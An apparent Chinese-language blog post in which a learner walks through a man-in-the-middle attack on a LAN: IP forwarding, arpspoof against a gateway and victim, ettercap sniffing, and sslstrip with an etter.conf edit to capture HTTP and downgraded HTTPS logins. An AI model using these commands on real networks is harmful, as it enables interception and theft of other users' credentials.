学习:kail linux获取http和https账号密码

看了教程学着做了两三天,就是获取不了,我也很懵逼,今天又莫名其妙的又能获取了,其中的原因还有待探索。

 

使用arp欺骗,转发流量,然后开启arp欺骗:echo 1 >/proc/sys/net/ipv4/ip_forward

                                                                              cat /proc/sys/net/ipv4/ip_forward

                                                                              arpspoof -i eth0 -t 192.168.1.1 192.168.1.121

 

学习:kail linux获取http和https账号密码_第1张图片

 

欺骗成功;然后进行ettercap :ettercap -Tq -i eth0

  学习:kail linux获取http和https账号密码_第2张图片

 

使用一个使用http协议的登录网站进行测试:(这里使用的是一个好不容易发现的一个网站,因为现在基本大一点的网站都使用https协议加密了)defcon.cn

学习:kail linux获取http和https账号密码_第3张图片

 

再查看kali 就会发现数据包已经抓下来了;(不知道为啥我要进行输入两次才能抓到,我也不知道原因,待探究)

撒发

user和PASS便是刚刚我们进行登录时输入的数据,CONTENT是http的内容,后面的log=xxxxxx  是使用URL加密的user同理pwd也是pass.

info便是我们进行登录的网址。

 

 

https账号密码获取:操作跟上面一样,不同的是要更改一下设置,然后把https转换为http,使用sslstrip进行转换;

首先使用命令:vim /etc/ettercap/etter.conf找到以下内容:

学习:kail linux获取http和https账号密码_第4张图片

按下  i  键,进入编辑模式,把#if you use iptables:下面的两个#去掉。然后按下Esc,Shift+:,q!(不保存,退出)或 wq(保存,退出)

 

        l另开一个标签:sslstrip -a -f -k

学习:kail linux获取http和https账号密码_第5张图片

 

 

感觉就算操作成功了,也还是一脸懵逼,因为还有好多不懂的地方。

你可能感兴趣的:(学习:kail linux获取http和https账号密码)